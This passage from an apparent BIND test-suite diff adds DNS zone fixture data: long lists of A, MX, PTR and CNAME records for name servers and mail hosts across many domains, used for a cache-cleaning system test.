604800 IN A 130.195.6.10 +ns2.GNAC.com. 604800 IN A 209.182.195.77 +PRIFI.EUNET.FI. 604800 IN A 193.66.1.146 +ns2.k12.vt.us. 604800 IN A 170.222.64.130 +ns2.nic.mnet. 604800 IN A 208.109.83.110 +NS0.PIPEX.net. 604800 IN A 158.43.128.8 +NS1.SANFRANCISCO.US.NETDNS.com. 604800 IN A 207.82.50.166 +AMRA.NIC.GOV.JO. 604800 IN A 193.188.66.103 +kw.com.CN. 604800 IN MX 15 mail2.kw.com.CN. +SHNS.163.net. 604800 IN A 61.129.65.108 +NS.ER.USGS.GOV. 604800 IN A 130.11.48.2 +FAITH.MYNET.net. 604800 IN A 207.13.11.2 +mail.smuggs.com. 604800 IN A 209.67.230.71 +MIMOS.MY. 604800 IN A 192.228.128.18 +NS.GU. 604800 IN A 168.123.4.10 +mx00.schlund.de. 604800 IN A 195.20.224.67 +mx00.schlund.de. 604800 IN A 195.20.224.68 +mx00.schlund.de. 604800 IN A 195.20.224.130 +mx00.schlund.de. 604800 IN A 195.20.224.152 +mx00.schlund.de. 604800 IN A 195.20.224.198 +CADDSYS.IPTEK.net. 604800 IN A 202.46.1.2 +NS0.TELIA.NIC.NU. 
604800 IN A 212.181.91.4 +NS2.GRANITECANYON.com. 604800 IN A 204.1.217.148 +GATEKEEPER.corning.com. 604800 IN A 149.42.1.2 +NS2.2DAY.com. 604800 IN A 202.89.128.74 +1.0.0.127.IN-ADDR.ARPA. 604800 IN PTR localhost. +RAIN.PSG.com. 604800 IN A 147.28.0.34 +STRAWB.MIT.EDU. 604800 IN A 18.71.0.151 +NS2.DIGISERVE.com. 604800 IN A 204.91.84.216 +UMACSN2.UMAC.MO. 604800 IN A 161.64.3.2 +NS.JM. 604800 IN A 196.2.1.6 +12.153.66.206.IN-ADDR.ARPA. 604800 IN PTR d.dd.org. +EAST.ISI.EDU. 604800 IN A 38.245.76.2 +NS2.UUNET.CA. 604800 IN A 142.77.1.5 +SUNNY.STAT-USA.GOV. 604800 IN A 192.239.70.8 +BOW.INTNET.CF. 604800 IN A 194.206.73.253 +NS4.TELE.DK. 604800 IN A 194.239.134.84 +NS2.sodak.net. 604800 IN A 63.65.239.225 +NS1.NEWYORK.US.NETDNS.com. 604800 IN A 216.32.212.86 +NS2.PSI.net. 604800 IN A 38.8.50.2 +NS.KREONET.RE.KR. 604800 IN A 134.75.30.1 +GIANT.MINDLINK.net. 604800 IN A 204.174.18.2 +NS0.SECTOR001.org. 604800 IN A 24.4.49.117 +DNS.SEABONE.net. 604800 IN A 195.22.205.163 +NS2.MANA.PF. 604800 IN A 202.3.225.20 +NRWEB.CENPAC.NET.NR. 604800 IN A 203.98.224.66 +www.TRAVELPHOTOCONTESTS.com. 604800 IN A 64.85.86.156 +NS1.REGEX.com. 604800 IN A 202.152.12.227 +BIGBIRD.ITD.nps.GOV. 604800 IN A 165.83.208.5 +CUNIXD.CC.COLUMBIA.EDU. 604800 IN A 128.59.35.142 +NS1.CLASSIFIEDMONSTER.com. 604800 IN A 216.254.54.22 +SERVER1.SANS.org. 604800 IN A 167.216.133.33 +BRONZE.COIL.com. 604800 IN A 198.4.94.1 +SCSNMS.SWITCH.CH. 604800 IN A 130.59.1.30 +SCSNMS.SWITCH.CH. 604800 IN A 130.59.10.30 +SCE.CNC.UNA.PY. 604800 IN A 200.10.228.133 +RELAY.LA.TIS.com. 604800 IN A 198.51.22.11 +NS.AUSTIN.IBM.com. 604800 IN A 192.35.232.34 +SERVICE.robert-morris.EDU. 604800 IN A 205.146.48.22 +MERCURY.ML.org. 604800 IN A 209.68.0.85 +proxy.pccf.net. 604800 IN A 205.189.73.123 +DUB-NAME-SVC-1.compuserve.com. 604800 IN A 149.174.213.5 +NS.CNRI.reston.va.us. 604800 IN A 132.151.1.1 +NS.UCAD.SN. 604800 IN A 196.1.95.1 +ns01.ny.us.ibm.net. 604800 IN A 165.87.194.244 +NS4-AUTH.ALASKA.net. 
604800 IN A 209.112.130.4 +BOW.INTNET.NE. 604800 IN A 194.51.164.253 +NS-JP.SINET.AD.JP. 604800 IN A 150.100.2.3 +ns.musin.de. 604800 IN A 194.113.40.45 +ip1.romkey.SEG.net. 604800 IN A 207.121.69.234 +DNS2.ITD.UMICH.EDU. 604800 IN A 141.211.125.15 +mail.rpi.EDU. 604800 IN A 128.113.100.7 +INECO.NIC.ES. 604800 IN A 194.69.254.2 +DNS2.FIREHOUSE.net. 604800 IN A 63.160.175.18 +BOW.INTNET.BJ. 604800 IN A 194.51.163.253 +sundown.vtc.VSC.EDU. 604800 IN A 155.42.12.12 +NIC.AIX.GR. 604800 IN A 195.130.89.210 +NIC.AD.JP. 604800 IN A 202.12.30.33 +NS.DC.IGC.org. 604800 IN A 199.75.208.10 +LHR.NS.GDNS.net. 604800 IN A 212.250.25.101 +NS2.WEBMAGIC.net. 604800 IN A 64.168.49.66 +MUNNARI.OZ.AU. 604800 IN A 128.250.1.21 +HIPPO.RU.AC.ZA. 604800 IN A 146.231.128.1 +PEBBLES.IOM.com. 604800 IN A 194.72.124.1 +penpal.dmz.RPSLMC.EDU. 604800 IN A 144.74.60.151 +netnews.HINET.net. 604800 IN A 168.95.195.16 +INS2.TOSA.TWTELECOM.net. 604800 IN A 204.95.160.4 +proxy6.cisco.com. 604800 IN A 203.41.198.245 +NS2.HOST4U.net. 604800 IN A 209.150.129.3 +POIPARAU.OYSTER.NET.CK. 604800 IN A 202.65.32.127 +NS-EXT.VIX.com. 604800 IN A 204.152.184.64 +NS2.NURSAT.net. 604800 IN A 212.13.167.1 +mail2.kw.com.CN. 604800 IN A 159.226.25.8 +NS-02B.ANS.net. 604800 IN A 207.24.245.178 +DNS.RCCN.net. 604800 IN A 193.136.7.17 +B.ROOT-SERVERS.ORSC. 604800 IN A 216.13.126.116 +FIREHOUSE.net. 604800 IN A 63.160.175.19 diff --git a/bin/tests/system/cacheclean/ns1/example.db b/bin/tests/system/cacheclean/ns1/example.db new file mode 100644 index 0000000..7262109 --- /dev/null +++ b/bin/tests/system/cacheclean/ns1/example.db 
@@ -0,0 +1,2942 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 999999 +$ORIGIN . +. IN SOA hostmaster.nominum.com. a.root-servers.nil. ( + 2000042100 + 600 + 600 + 1200 + 600 + ) +. NS a.root-servers.nil. +a.root-servers.nil IN A 10.53.0.1 +localhost IN A 127.0.0.1 +$ORIGIN NIC.AC. +NS IN A 194.205.62.120 +$ORIGIN AD. +DNS2 IN A 194.158.64.8 +DINIS IN A 194.158.64.7 +$ORIGIN NIC.AD. +DNS IN A 194.158.67.251 +$ORIGIN STA.AD. +CORREU IN A 194.158.67.1 +$ORIGIN EMIRATES.NET.AE. +NS2 IN A 194.170.1.7 +NS1 IN A 194.170.1.6 +$ORIGIN BA. +NS IN A 195.130.35.5 +$ORIGIN UTIC.NET.BA. +SAVA IN A 195.130.35.3 +$ORIGIN OFFSHORE.AI. +NS1 IN A 209.88.68.34 +$ORIGIN BD. +DNS1 IN A 209.58.24.5 +DNS IN A 209.58.24.3 +$ORIGIN MENTOR.BE. +APHEX IN A 193.121.64.5 +$ORIGIN EUNET.BE. +SECDNS IN A 193.74.208.139 +$ORIGIN BELNET.BE. +NS IN A 193.190.198.10 + IN A 193.190.198.2 +$ORIGIN DNS.BE. +MASTER IN A 194.7.171.243 +$ORIGIN CS.KULEUVEN.AC.BE. +DNS IN A 134.58.40.4 +$ORIGIN CURINFO.AN. +NS01-SERVER IN A 200.44.117.129 +KADUSHI IN A 200.44.117.130 +$ORIGIN ONATEL.BF. +NAHOURI IN A 206.82.130.195 +$ORIGIN DIGSYS.BG. +NS IN A 192.92.129.1 +$ORIGIN BATELCO.COM.BH. +SV10 IN A 193.188.124.227 +NS2 IN A 193.188.97.212 +NS IN A 193.188.97.197 +$ORIGIN UTORONTO.CA. +ns2 IN A 128.100.102.202 +ns1 IN A 128.100.100.129 +chime IN A 128.100.102.201 +$ORIGIN cs.UTORONTO.CA. +bay IN A 128.100.1.1 +$ORIGIN UTCC.UTORONTO.CA. +DNS2 IN A 128.100.102.201 +$ORIGIN UUNET.CA. +NS2 IN A 142.77.1.5 +NS IN A 142.77.1.1 +$ORIGIN CIRA.CA. +MERLE IN A 64.26.149.98 +$ORIGIN cmc.ec.gc.CA. +castor IN A 142.135.4.14 +$ORIGIN RISQ.QC.CA. 
+CLOUSO IN A 192.26.210.1 +$ORIGIN MBNET.MB.CA. +ACCESS IN A 130.179.16.143 +$ORIGIN CDNNET.CA. +RELAY IN A 192.73.5.1 +$ORIGIN uwaterloo.CA. +ns2 IN A 129.97.128.100 +math IN A 129.97.140.144 + IN A 129.97.216.42 + IN MX 0 math.uwaterloo.ca. +ns1 IN A 129.97.128.10 +$ORIGIN AR. +CTINA IN A 200.16.97.17 +ATHEA IN A 200.16.98.2 +$ORIGIN NIC.AR. +TULKU IN A 200.16.97.77 +$ORIGIN RETINA.AR. +NS1 IN A 200.10.202.3 +$ORIGIN INTNET.BJ. +BOW IN A 194.51.163.253 +$ORIGIN NIC.CD. +DNS IN A 194.38.74.11 +$ORIGIN tahina.priv.at. +styx IN A 194.152.163.253 +$ORIGIN UNIVIE.AC.at. +NS2 IN A 193.171.255.66 +NS7 IN A 194.246.96.192 +NS1 IN A 193.171.255.2 +$ORIGIN OZ.AU. +MUNNARI IN A 128.250.1.21 +$ORIGIN CS.MU.OZ.AU. +MULGA IN A 128.250.1.22 + IN A 128.250.37.150 +$ORIGIN AARNET.EDU.AU. +JATZ IN A 139.130.204.4 +$ORIGIN ANU.EDU.AU. +CHEOPS IN A 150.203.224.24 +$ORIGIN CS.UOW.EDU.AU. +WRAITH IN A 130.130.64.1 +$ORIGIN ALCANET.COM.AU. +NS IN A 203.62.196.10 +$ORIGIN CONNECT.COM.AU. +YARRINA IN A 192.189.54.17 +$ORIGIN IBL.BM. +NS1 IN A 199.172.192.1 +$ORIGIN BRUNET.BN. +JTB IN A 202.160.8.2 +$ORIGIN INTNET.CF. +BOW IN A 194.206.73.253 +$ORIGIN SETARNET.AW. +NS2 IN A 206.48.100.11 +NS1 IN A 206.48.100.5 +$ORIGIN BOLNET.BO. +UTAMA IN A 166.114.1.40 +$ORIGIN SWITCH.CH. +SCSNMS IN A 130.59.1.30 + IN A 130.59.10.30 +MERAPI IN A 130.59.211.10 +$ORIGIN ITU.CH. +NS IN A 156.106.192.121 +$ORIGIN NIC.CH. +DOMREG IN A 130.59.1.80 +$ORIGIN ip6.INT. +z IN A 198.32.2.66 + IN AAAA 3ffe:0:1::c60:242 +$ORIGIN DNS.BR. +NS2 IN A 200.19.119.99 +NS1 IN A 200.255.253.234 +NS IN A 143.108.23.2 +$ORIGIN OYSTER.NET.CK. +POIPARAU IN A 202.65.32.127 +PARAU IN A 202.65.32.128 +$ORIGIN DRUKNET.NET.BT. +NS IN A 202.144.128.200 +$ORIGIN DCC.UCHILE.CL. +NS IN A 146.83.5.204 +$ORIGIN NIC.CL. +NS IN A 146.83.4.11 +$ORIGIN FIRSTCOM.CL. +NS IN A 200.27.2.2 +$ORIGIN EDU. +ISI IN A 128.9.176.32 +UMASS IN MX 20 vcmr-54.server.rpi.edu. + IN MX 1 mail.rpi.edu. +dartmouth IN A 129.170.16.6 + IN MX 10 donner.dartmouth.edu. 
+ IN MX 10 prancer.dartmouth.edu. + IN MX 10 vixen.dartmouth.edu. + IN MX 10 blitzen.dartmouth.edu. + IN MX 0 mailhub.dartmouth.edu. + IN MX 10 dasher.dartmouth.edu. +rush IN MX 30 penpal.dmz.rpslmc.edu. + IN MX 10 detox.cc1.rpslmc.edu. + IN MX 20 rush.cc1.rpslmc.edu. +NYU IN A 128.122.253.92 +GATECH IN A 130.207.244.244 +ARIZONA IN A 128.196.128.233 +stanford IN A 171.64.14.120 + IN MX 20 Leland.stanford.edu. + IN MX 20 Leland2.stanford.edu. + IN MX 20 Leland3.stanford.edu. +$ORIGIN jhuapl.EDU. +ECSEL IN A 128.244.65.29 +APLDNS2 IN A 128.244.194.100 +ABACUS IN A 128.244.197.32 +$ORIGIN MIT.EDU. +STRAWB IN A 18.71.0.151 +W20NS IN A 18.70.0.160 +BITSY IN A 18.72.0.3 +$ORIGIN ITD.UMICH.EDU. +DNS2 IN A 141.211.125.15 +$ORIGIN ISI.EDU. +EAST IN A 38.245.76.2 +VENERA IN A 128.9.176.32 +NS IN A 128.9.128.127 +$ORIGIN CS.PURDUE.EDU. +PENDRAGON IN A 128.10.2.5 +$ORIGIN CS.WISC.EDU. +DNS IN A 128.105.2.10 +$ORIGIN UMD.EDU. +TRANTOR IN A 128.8.10.14 +$ORIGIN RPSLMC.EDU. +THUMPER IN A 144.74.22.8 +$ORIGIN dmz.RPSLMC.EDU. +penpal IN A 144.74.60.151 +$ORIGIN cc1.RPSLMC.EDU. +rush IN A 144.74.150.23 +detox IN A 144.74.150.44 +$ORIGIN IS.RPSLMC.EDU. +SUNSTROKE IN A 144.74.21.8 +$ORIGIN VSC.EDU. +vtc IN MX 0 eve.vtc.vsc.edu. +MAZE IN A 155.42.1.89 +ENIGMA IN A 155.42.1.7 +$ORIGIN vtc.VSC.EDU. +sundown IN A 155.42.12.12 +eve IN A 155.42.12.102 +$ORIGIN UMASS.EDU. +NS1 IN A 128.119.166.14 +NIC IN A 128.119.175.14 +$ORIGIN oit.UMASS.EDU. +supai IN A 128.119.175.6 +ponzi IN A 128.119.166.18 +$ORIGIN ECS.UMASS.EDU. +KIRA IN A 128.119.91.10 +$ORIGIN CS.UMASS.EDU. +UNIX1 IN A 128.119.40.12 +$ORIGIN UPR.CLU.EDU. +UPR1 IN A 136.145.1.4 +$ORIGIN PRINCETON.EDU. +DNS IN A 128.112.129.15 +$ORIGIN rpi.EDU. +mail IN A 128.113.100.7 +$ORIGIN server.rpi.EDU. +vcmr-54 IN A 128.113.113.44 +$ORIGIN acs.rpi.EDU. +freefour IN A 128.113.24.91 +$ORIGIN ITS.rpi.EDU. +NETSERV2 IN A 128.113.1.3 +NETSERV1 IN A 128.113.1.5 +$ORIGIN uvm.EDU. 
+NS1 IN A 132.198.201.10 +NS2 IN A 132.198.202.10 +$ORIGIN dartmouth.EDU. +dasher IN A 129.170.208.6 +mailhub IN A 129.170.16.6 +donner IN A 129.170.208.3 +prancer IN A 129.170.208.2 +vixen IN A 129.170.208.15 +NS1 IN A 129.170.17.4 +blitzen IN A 129.170.208.4 +NS2 IN A 129.170.16.4 +$ORIGIN middlebury.EDU. +CATAMOUNT IN A 140.233.2.204 +LION IN A 140.233.1.4 +$ORIGIN CIT.CORNELL.EDU. +DNS IN A 192.35.82.50 +$ORIGIN CS.CORNELL.EDU. +SIMON IN A 128.84.154.10 +$ORIGIN BERKELEY.EDU. +NS2 IN A 128.32.136.12 + IN A 128.32.206.12 +NS1 IN A 128.32.136.9 + IN A 128.32.206.9 +$ORIGIN CS.BERKELEY.EDU. +VANGOGH IN A 128.32.33.5 +$ORIGIN ctr.COLUMBIA.EDU. +ntp IN CNAME sirius.ctr.columbia.edu. +sirius IN A 128.59.64.60 +$ORIGIN CC.COLUMBIA.EDU. +CUNIXD IN A 128.59.35.142 +$ORIGIN UOREGON.EDU. +PHLOEM IN A 128.223.32.35 +$ORIGIN GATECH.EDU. +TROLL-GW IN A 130.207.244.251 +$ORIGIN CC.GATECH.EDU. +BURDELL IN A 130.207.3.207 +$ORIGIN UTK.EDU. +NS0 IN A 160.36.0.66 +NS1 IN A 160.36.128.66 +$ORIGIN robert-morris.EDU. +SERVICE IN A 205.146.48.22 +COLONIAL-SERVER IN A 205.146.48.25 +$ORIGIN CNS.vt.EDU. +YARDBIRD IN A 198.82.247.34 +MILO IN A 198.82.247.98 +$ORIGIN stanford.EDU. +Leland2 IN A 171.64.14.58 +AVALLONE IN A 171.64.2.210 +ATALANTE IN A 171.64.2.220 +ARGUS IN A 171.64.2.230 +$ORIGIN slac.stanford.EDU. +SMTP IN A 134.79.18.80 +NS2 IN A 134.79.16.10 +NS1 IN A 134.79.16.9 +$ORIGIN HARVARD.EDU. +NS2 IN A 128.103.1.1 +ns IN A 128.103.201.100 +NS1 IN A 128.103.200.101 +$ORIGIN med.HARVARD.EDU. +jenner IN A 134.174.141.2 +knight IN A 134.174.141.46 +eno IN A 134.174.141.50 +heckle IN A 134.174.146.152 +$ORIGIN de. +datingagentur IN A 212.227.216.57 + IN MX 10 mx01.schlund.de. + IN MX 10 mx00.schlund.de. +$ORIGIN schlund.de. 
+mx00 IN A 195.20.224.130 + IN A 195.20.224.198 + IN A 195.20.224.67 + IN A 195.20.224.68 + IN A 195.20.224.152 +ns4 IN A 195.20.225.36 +mx01 IN A 195.20.224.131 + IN A 195.20.224.236 + IN A 195.20.224.237 + IN A 195.20.224.238 +ns3 IN A 195.20.224.95 +$ORIGIN Informatik.Uni-Dortmund.de. +waldorf IN A 129.217.4.42 +$ORIGIN muc.de. +faerber IN MX 10 slarti.muc.de. + IN A 193.149.49.70 +ns2 IN A 193.149.48.2 +slarti IN A 193.149.48.10 +ns1 IN A 193.149.48.11 +$ORIGIN westfalen.de. +muenster IN A 193.174.5.2 +$ORIGIN lan-ks.de. +uranus IN A 194.45.71.1 +$ORIGIN kaben-net.de. +dns IN A 195.179.28.17 +$ORIGIN thur.de. +jengate IN A 193.174.15.34 +$ORIGIN erfurt.thur.de. +annwfn IN A 194.122.210.3 +$ORIGIN sgh-net.de. +ns1 IN A 212.86.129.142 +$ORIGIN DENIC.de. +SSS-NL IN A 193.0.0.237 +SSS-AT IN A 193.171.255.34 +DNS IN A 194.246.96.79 +$ORIGIN iks-jena.de. +avalon IN A 194.221.90.34 +$ORIGIN musin.de. +ns IN A 194.113.40.45 +$ORIGIN rrz.Uni-Koeln.de. +noc IN A 134.95.100.209 +$ORIGIN BelWue.de. +noc IN A 129.143.2.1 +$ORIGIN HRZ.uni-bielefeld.de. +noc IN A 129.70.5.16 +$ORIGIN techfak.uni-bielefeld.de. +techfac IN A 129.70.132.100 +$ORIGIN CUBE.de. +NS1 IN A 212.162.54.243 +$ORIGIN dtag.de. +pns IN A 194.25.0.125 +$ORIGIN netconx.de. +netconsult IN A 193.141.75.1 +$ORIGIN CAMNET.CM. +KIM IN A 195.24.192.35 +LOM IN A 195.24.192.34 +SANAGA IN A 195.24.192.17 +$ORIGIN sxtyptt.NET.CN. +ns IN A 202.99.192.68 +$ORIGIN sta.NET.CN. +ns IN A 202.96.199.133 +$ORIGIN BTA.NET.CN. +NS IN A 202.96.0.133 +$ORIGIN CNNIC.NET.CN. +sld-ns2 IN A 202.97.16.197 +DNS2 IN A 202.97.16.196 +sld-ns1 IN A 159.226.1.3 +$ORIGIN com.CN. +kw IN MX 15 mail2.kw.com.cn. +$ORIGIN kw.com.CN. +mail2 IN A 159.226.25.8 +ns IN A 159.226.25.8 +$ORIGIN CNC.AC.CN. +NS IN A 159.226.1.1 +$ORIGIN UNIANDES.EDU.CO. +AYAX IN A 157.253.50.30 +CDCNET IN A 157.253.1.13 +$ORIGIN SCSI.GOV.BY. +SUN IN A 195.50.5.103 +NS2 IN A 194.67.193.130 +$ORIGIN OPEN.BY. +A IN A 194.226.121.36 +$ORIGIN CR. 
+NS IN A 163.178.8.2 +$ORIGIN UCR.AC.CR. +NS IN A 163.178.88.2 +$ORIGIN INTNET.DJ. +BOW IN A 193.251.143.253 +$ORIGIN DARENET.DK. +NS-SOA IN A 130.226.1.4 +$ORIGIN TELE.DK. +NS4 IN A 194.239.134.84 +$ORIGIN DAIMI.AAU.DK. +URANUS IN A 130.225.16.40 +$ORIGIN DK-HOSTMASTER.DK. +NS IN A 193.163.102.2 +$ORIGIN EC. +ECNET IN A 157.100.45.2 +$ORIGIN NET.EC. +ECUA IN A 157.100.1.2 +$ORIGIN CENIAI.NET.CU. +NS IN A 169.158.128.136 +$ORIGIN EENET.EE. +NS IN A 193.40.56.245 +$ORIGIN KBFI.EE. +NS IN A 192.121.251.13 +$ORIGIN NIC.DO. +NS IN A 207.176.16.50 +$ORIGIN EUN.EG. +FRCU IN A 193.227.1.1 +$ORIGIN CIX.CX. +NS IN A 195.222.235.216 +$ORIGIN CX.ESCROW.IOCOMM.NET.CX. +NS1 IN A 203.132.96.2 +$ORIGIN CCS.UCY.AC.CY. +NICOSIA IN A 194.42.6.97 +$ORIGIN CC.UCY.AC.CY. +ZEUS IN A 194.42.1.1 +$ORIGIN EUNET.CZ. +CZ IN A 193.85.3.130 +$ORIGIN EUNET.FI. +PRIFI IN A 193.66.1.146 +$ORIGIN NIXU.FI. +NS IN A 193.209.237.29 +$ORIGIN TELE.FI. +NS IN A 193.210.19.19 +$ORIGIN HELSINKI.FI. +HYDRA IN A 128.214.4.29 +$ORIGIN INET.GA. +KOMO IN A 208.148.44.1 +$ORIGIN CERIST.DZ. +DECST IN A 193.194.64.11 +$ORIGIN ELDJAZAIR.NET.DZ. +CASBAH IN A 193.194.81.45 +$ORIGIN USP.AC.FJ. +TERI IN A 144.120.8.1 +$ORIGIN EUNET.ES. +NS IN A 193.127.1.11 +$ORIGIN NIC.ES. +INECO IN A 194.69.254.2 +NS1 IN A 194.69.254.1 +$ORIGIN VISUALCOM.ES. +NS IN A 194.143.202.202 +$ORIGIN MICROASTUR.ES. +SERVIDOR IN A 195.76.178.5 +$ORIGIN CESCA.ES. +PRADES IN A 192.94.163.152 +$ORIGIN PIXAR.ES. +NS IN A 194.143.196.3 +$ORIGIN REDIRIS.ES. +SUN IN A 130.206.1.2 +$ORIGIN SEKER.ES. +CORREOS IN A 194.179.87.1 +$ORIGIN TELECOM.NET.ET. +NS IN A 196.27.22.43 +$ORIGIN FM. +FM03 IN A 206.49.89.4 +FM01 IN A 206.49.89.2 +$ORIGIN NPLUS.GF. +NS1 IN A 195.6.144.3 +$ORIGIN trns. +f IN A 209.133.38.16 +d IN A 207.112.147.14 +e IN A 145.89.234.7 +c IN A 212.172.21.254 +a IN A 64.6.65.10 +$ORIGIN IRD.FR. +NS IN A 195.83.14.1 +$ORIGIN BONDY.IRD.FR. +MALAKULA IN A 193.50.53.1 +$ORIGIN RAIN.FR. +BOW IN A 194.51.3.49 +$ORIGIN imag.FR. 
+isis IN A 129.88.32.24 +imag IN A 129.88.30.1 +$ORIGIN INRIA.FR. +DNS IN A 193.51.208.13 +$ORIGIN NIC.FR. +NS2 IN A 192.93.0.4 +NS1 IN A 192.93.0.1 +NS3 IN A 192.134.0.49 +$ORIGIN GH.GL. +KAASASSUK IN A 194.177.232.3 +$ORIGIN TELE.GL. +TGSERV IN A 194.177.224.7 +$ORIGIN COMMIT.GM. +NS1 IN A 63.77.152.177 +$ORIGIN MRC.GM. +NS1 IN A 212.60.69.1 +$ORIGIN INTNET.GQ. +BOW IN A 195.101.152.253 +$ORIGIN AIX.GR. +NIC IN A 195.130.89.210 +$ORIGIN GRNET.GR. +FOO IN A 194.177.210.211 +NIC IN A 194.177.210.210 +$ORIGIN CSI.FORTH.GR. +ESTIA IN A 139.91.191.3 +$ORIGIN ICS.FORTH.GR. +DNS1 IN A 139.91.151.70 +GRDNS IN A 139.91.1.1 +$ORIGIN HKU.HK. +HKUXB IN A 147.8.16.15 +$ORIGIN CUHK.EDU.HK. +NS2 IN A 137.189.6.21 +NS1 IN A 137.189.6.1 +$ORIGIN CONCYT.GOB.GT. +NS IN A 168.234.106.2 +$ORIGIN UVG.EDU.GT. +NS IN A 168.234.68.2 +$ORIGIN ID. +NS1 IN A 202.155.30.227 +$ORIGIN AC.ID. +NS IN A 202.159.124.34 +$ORIGIN GU. +NS IN A 168.123.4.10 +$ORIGIN EDU.GU. +NS IN A 168.123.2.50 +$ORIGIN REGISTRY.HM. +NS2 IN A 209.54.168.55 +NS3 IN A 202.169.102.24 +NS1 IN A 204.144.183.78 +$ORIGIN CONNECT.IE. +AUTH01 IN A 194.106.128.50 +$ORIGIN DOMAINREGISTRY.IE. +BANBA IN A 193.1.142.2 +$ORIGIN VIA-NET-WORKS.IE. +ICE IN A 212.17.32.2 +$ORIGIN HONDUTEL.HN. +MIRAF-SERVER3 IN A 206.48.104.142 +$ORIGIN SRCE.HR. +DNS IN A 161.53.3.7 +$ORIGIN HUJI.AC.IL. +RELAY IN A 128.139.6.1 +$ORIGIN TAU.AC.IL. +ARISTO IN A 132.66.32.10 +$ORIGIN NIC.JE. +NS1 IN A 216.110.45.224 +$ORIGIN SZTAKI.HU. +NS2 IN A 193.225.86.1 +$ORIGIN NIC.HU. +NS IN A 193.6.27.62 +$ORIGIN NCST.ERNET.IN. +NAAMAK IN A 202.41.110.66 +SS585 IN A 202.141.150.18 +$ORIGIN NIC.IO. +NS IN A 194.205.62.100 +$ORIGIN NIC.IR. +NS1 IN A 194.225.70.83 +$ORIGIN IS. +ISGATE IN A 193.4.58.51 +$ORIGIN IUNET.IT. +DNS2 IN A 192.106.1.31 +NS IN A 192.106.1.1 +$ORIGIN INFN.IT. +SERVER2 IN A 131.154.1.3 +$ORIGIN CNR.IT. +NAMESERVER IN A 194.119.192.34 +$ORIGIN IAT.CNR.IT. +ITGBOX IN A 146.48.65.46 +$ORIGIN NETTUNO.IT. +BOLOGNA IN A 193.43.2.5 +$ORIGIN NIC.IT. 
+DNS IN A 193.205.245.5 +$ORIGIN JM. +NS IN A 196.2.1.6 +$ORIGIN CAST.EDU.JM. +NS IN A 200.9.115.2 +$ORIGIN NIC.GOV.JO. +AMRA IN A 193.188.66.103 +PETRA IN A 193.188.66.2 +$ORIGIN KG. +NS IN A 195.38.160.36 +$ORIGIN AD.JP. +NIC IN A 202.12.30.33 +$ORIGIN ocn.AD.JP. +ns-tk012 IN A 203.139.160.74 +$ORIGIN IIJ.AD.JP. +NS0 IN A 202.232.2.34 +$ORIGIN SINET.AD.JP. +NS-JP IN A 150.100.2.3 +$ORIGIN SPIN.AD.JP. +DNS0 IN A 165.76.0.98 +$ORIGIN NIC.AD.JP. +ns2 IN A 202.12.30.133 +TRF IN A 192.41.192.2 +NS-JP IN A 61.120.151.100 +NS0 IN A 202.12.30.131 +ns1 IN A 202.12.30.33 +$ORIGIN WIDE.AD.JP. +NS IN A 203.178.136.63 + IN MX 10 integra.s-integra.co.jp. +$ORIGIN s-integra.co.JP. +integra IN A 210.162.202.34 +$ORIGIN UUCP.NE.JP. +NS2 IN A 210.141.111.69 +$ORIGIN DNS.NET.KH. +NS1 IN A 203.127.100.21 +$ORIGIN org. +netsage IN A 209.67.235.38 +ietf IN A 132.151.1.19 + IN MX 10 odin.ietf.org. +vmba IN MX 10 gro.dd.org. +bnfinfo IN MX 10 mail.sover.net. + IN MX 20 mqueue.sover.net. +dd IN MX 10 gro.dd.org. + IN MX 50 mqueue.sover.net. + IN MX 100 mail.uu.net. +vtvast IN A 207.217.96.38 + IN A 207.217.96.39 + IN A 207.217.96.40 + IN A 207.217.96.41 + IN A 207.217.96.42 + IN A 207.217.96.43 + IN A 207.217.96.44 + IN A 207.217.96.45 + IN A 207.217.96.28 + IN A 207.217.96.29 + IN A 207.217.96.30 + IN A 207.217.96.31 + IN A 207.217.96.32 + IN A 207.217.96.33 + IN A 207.217.96.34 + IN A 207.217.96.35 + IN A 207.217.96.36 + IN A 207.217.96.37 + IN MX 10 vipmailgate.earthlink.net. +gazpacho IN A 209.67.235.38 +bikeclub IN MX 20 pop.shoreham.net. + IN MX 50 smtp.america.net. +giffordmed IN A 130.189.100.57 + IN MX 20 quest-net.com. + IN MX 10 mail.giffordmed.org. +isc IN A 204.152.184.101 +icann IN MX 100 mail.icann.org. + IN MX 95 mailhub.icann.org. +xaos IN A 24.93.15.22 + IN TXT "XAOS Associates Online Services" + IN MX 0 mail.xaos.org. + IN MX 5 gw.xaos.org. + IN LOC 43 02 20.000 N 77 43 12.000 W 170.00m 1.00m 30.00m 10.00m +mmuuf IN MX 10 gro.dd.org. 
+reptiles IN A 198.96.117.142 + IN MX 10 mail2.reptiles.org. + IN MX 20 mail.vex.net. + IN MX 5 mail.reptiles.org. +iscvt IN A 207.136.209.132 + IN MX 10 isc-01.iscvt.org. + IN MX 20 mqueue.sover.net. +mailinglists IN A 63.160.175.18 +lawlinevt IN MX 20 mqueue.sover.net. + IN MX 10 host3.vtlegalaid.org. +mail-abuse IN A 204.152.184.74 +$ORIGIN SECTOR001.org. +NS0 IN A 24.4.49.117 +NS1 IN A 24.4.49.246 +$ORIGIN ML.org. +MERCURY IN A 209.68.0.85 +$ORIGIN XBILL.org. +NS IN A 204.152.186.163 +$ORIGIN spack.org. +maus IN A 204.245.198.90 +$ORIGIN netsage.org. +keith IN A 209.67.235.37 +www IN CNAME netsage.org. +sure IN A 209.67.235.38 +$ORIGIN ietf.org. +odin IN A 132.151.1.176 +www2 IN A 4.17.168.6 +www IN CNAME www2.ietf.org. +$ORIGIN lux.dot-eu.org. +ns0 IN A 195.206.105.102 +$ORIGIN the-frontier.org. +ns2 IN A 216.86.199.115 +ns1 IN A 216.86.199.114 +$ORIGIN vmba.org. +www IN MX 10 gro.dd.org. + IN A 209.198.103.206 +$ORIGIN WILLIAM.org. +JOANNA IN A 195.153.6.2 +$ORIGIN FROGHOUSE.org. +DNS IN A 207.121.69.243 +$ORIGIN VTLEGALAID.org. +host3 IN A 207.136.208.115 +$ORIGIN dd.org. +doubt IN A 209.198.103.193 +news IN CNAME gro.dd.org. +gro IN A 209.198.103.200 +d IN A 209.198.103.199 +workgroup IN A 209.198.103.201 +dhcp1 IN A 209.198.103.194 +go IN A 